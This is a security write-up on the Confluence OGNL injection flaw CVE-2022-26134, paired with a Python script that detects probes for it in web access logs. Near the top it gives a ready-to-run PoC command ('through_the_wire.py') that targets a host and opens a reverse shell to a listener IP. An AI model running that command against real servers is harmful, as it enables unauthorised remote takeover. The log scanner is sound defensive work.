Atlassian Confluence

Atlassian Confluence is a widely used web-based collaboration platform that lets teams create, share, and manage documentation and internal knowledge bases. It supports on-premises installations through Confluence Server and scalable deployments through Confluence Data Center.

Unauthenticated RCE

Confluence Server and Data Center versions from 1.3.0 up to (but not including) 7.4.17, as well as specific version ranges between 7.13.0 and 7.18.1, are vulnerable to an unauthenticated RCE flaw (CVE-2022-26134). When a vulnerable Confluence endpoint receives a maliciously crafted HTTP request containing a specially constructed Object-Graph Navigation Language (OGNL) expression, the server evaluates that expression as code. This gives the attacker control over the underlying OS, allowing arbitrary command execution with the privileges of the Confluence service account. A working PoC is available.

python3 through_the_wire.py --rhost <target-IP> --rport 8090 --lhost 192.168.45.170 --lport 80 --reverse-shell --protocol http://
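Because the injected OGNL expression travels inside the HTTP request itself, the web access log is the first place to look when triaging whether an instance was probed for this flaw. The script below is an added example, not code from the original page or from the PoC it references: it parses Tomcat/Apache combined-format access log lines, URL-decodes the request path (repeatedly, so double-encoded requests are not missed) and flags any path that still contains an `${...}` expression after decoding. The log lines are constructed for the example, and `${example_expression}` is a neutral placeholder standing in for whatever expression an attacker injected.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in Tomcat/Apache combined format.
# These are not real traffic; the ${example_expression} placeholder stands in
# for an injected OGNL expression. Line 3 is the same request double-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Jun/2022:10:15:01 +0000] "GET /login.action HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [03/Jun/2022:10:15:07 +0000] "GET /%24%7Bexample_expression%7D/ HTTP/1.1" 302 0 "-" "curl/7.68.0"
10.0.0.9 - - [03/Jun/2022:10:15:09 +0000] "GET /%2524%257Bexample_expression%257D/ HTTP/1.1" 302 0 "-" "curl/7.68.0"
10.0.0.7 - - [03/Jun/2022:10:16:00 +0000] "GET /display/DOCS/Home HTTP/1.1" 200 8811 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD path proto", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# An OGNL expression delimited by ${ ... } anywhere in the decoded path.
OGNL_RE = re.compile(r'\$\{.*\}')


def fully_decode(value, max_rounds=3):
    """URL-decode until the string stops changing (bounded), so that
    %2524%257B -> %24%7B -> ${ is caught, not just single encoding."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_access_log(text):
    """Return one finding per log line whose decoded request path carries
    a ${...} expression. Lines that do not parse are skipped."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        decoded_path = fully_decode(match['path'])
        if OGNL_RE.search(decoded_path):
            findings.append({
                'ip': match['ip'],
                'timestamp': match['ts'],
                'method': match['method'],
                'status': int(match['status']),
                'raw_path': match['path'],
                'decoded_path': decoded_path,
            })
    return findings


if __name__ == '__main__':
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"{hit['timestamp']} {hit['ip']} {hit['method']} "
              f"{hit['decoded_path']} -> HTTP {hit['status']}")
```

Run it against a real log by replacing `SAMPLE_LOG` with the file contents. Decoding in a loop rather than once matters: a single `unquote` on the double-encoded line leaves `%24%7B` in place and the pattern never matches. A hit is a reason to pull the host's process and network activity for that timestamp, since a successful request means the expression already ran as the Confluence service account.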
